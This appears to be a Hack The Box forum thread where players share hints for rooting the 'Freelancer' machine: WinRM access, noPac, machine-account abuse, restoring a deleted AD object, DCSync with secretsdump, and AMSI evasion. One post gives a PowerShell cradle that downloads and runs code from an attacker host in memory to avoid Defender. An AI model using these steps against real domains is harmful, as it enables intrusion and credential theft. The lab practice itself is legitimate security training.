Finally
3 Likes
One password from the dump is correct for this user. Try use CrackMapExec. You will get the answer.
Thanks. Am I suppose to see a hash for lorra199? Cus I get two passes and neither work. Tried password spraying but nothing.
From dump you should have clear-text pass
What would be the next step to get root? Any hint?
thatās odd cause that password with ANY users on the box does not work with RCs.exe. Am I missing something?? I cannot get it to work with the user we need to move to (l*9)
The user is a Remote Management Group member. You can use the password with Win RM.
I got a couple of paths yesterday but only tried some because it was too late.
Iāve tried to run Sharphound (the powershell and executable) but it was blocked. PowerView also got blocked. So I had to rely on manual enumeration.
The user has the privilege to elevate a processā privileges and can add a workstation to the domain. Iāve thought of adding a workstation and trying to force a DC Sync with it but had to have another privileges for that (a GenericWrite type). Also tried the noPac (CVE-2021-42278 + CVE-2021-42287) just because of the SeMachineAccountPrivilege, it was automated and it was late, but also did not work.
Got a hit (āfreelancer.htb 445 DC VULNERABLEā) after checking a vulnerabilty with a tool, so Iām going to check if it can elevate my privileges.
1 Like
Got forbid me for being so stupid, rooted at last.
Giant kudos to @FroggieDrinks for being so patient and answering my questions.
2 Likes
This is the correct path. youre so close.
If you add an explotiable object to the domain there might be something you can GENERATE that is very abusable for DCSYNC
1 Like
Thatās what I thoughtā¦ I got a GitHub which tells the exact path to do it, but some of the cmdlets donāt work.
Going to see If I can tweak them to work.
Some of the cmdlets I need to abuse creating a machine and, after a couple of changes in properties, force a DC Sync is from Powersploit.
Canāt seem to find an article that doesnāt use one of their scripts and every single one of them gets blocked by Defender and deleted afterwards.
If someone can give me a light, here, Iād appreciate!
you need to do ASMI evasion.
If you cant find one that works i can share what i used just DM me. It worked for me but some people it didnt. Just have to keep trying to you find one that works.
for amsi bypass you can use the hardware breakpointā¦
serve it from attacker machine using python -m server and on the victim:
$wc = New-Object New.WebClient
$hbp = $wc.DownloadString("http://10.10.?.?:8888")
iex $hbp
then to run any powershell you need you download it the same way using the $wcā¦ donāt save it to disk because defender will delete itā¦
the machine seems very unstable to keep on the next stepsā¦ I found the deleted userā¦ sometimes I can restore it with lorra and sometimes I get permission deniedā¦ it is really weirdā¦
at a certain time I was able to restore it and give dcsync rights to lizaā¦ but even then the command secretsdump just dc didnāt workā¦ bad name something like thatā¦ I believe this is the way but honestly I am really impressed that people solved this machine in a matter of hoursā¦ considering everything those guys are just insaneā¦
this was the error to be more specific:
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
Restore-ADObject : Access is denied
At line:1 char:1
+ Restore-ADObject -Identity "ebe<removed to post here in htb>138" -Ne ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (CN=
lolā¦ now it is even worse!
Get-ADObject : Unable to find a default server with Active Directory Web Services running.
At line:1 char:1
+ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Pr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [Get-ADObject], ADServerDownException
+ FullyQualifiedErrorId : ActiveDirectoryServer:1355,Microsoft.ActiveDirectory.Management.Commands.GetADObject
itās randomā¦ sometimes it worksā¦ sometimes it does notā¦ oh my god!
2 Likes
Yeah its been really dificult helping others with this box becuase one thing that works sometimes doesnt work for others. its super odd.
Hats off to the people that First blooded root in less than 3 hrs they are really insane
2 Likes
Man, this was hard! Bumping through the errors in the box and some incompatibilities, but it got through.
Thanks to @assquired, @FroggieDrinks and @SkilledLeaf, wouldnāt have done without your help.
4 Likes
Iāve had the same issue.
Kept trying until they just stabilized themselves.
Also using the 64 bit version of netcat helped.
You could try changing your vpn to a different server
Since I was making some notes about the machine and chatting about this deleted AD Object with @5ubt13, I thought about trying a session with the hashes I got in the end.
As It turns out this Object has the same privileges as of the Remote Management Group member user we got in the end of the āForensics partā.
Just feels like something to waste some time and get to the same point.
2 Likes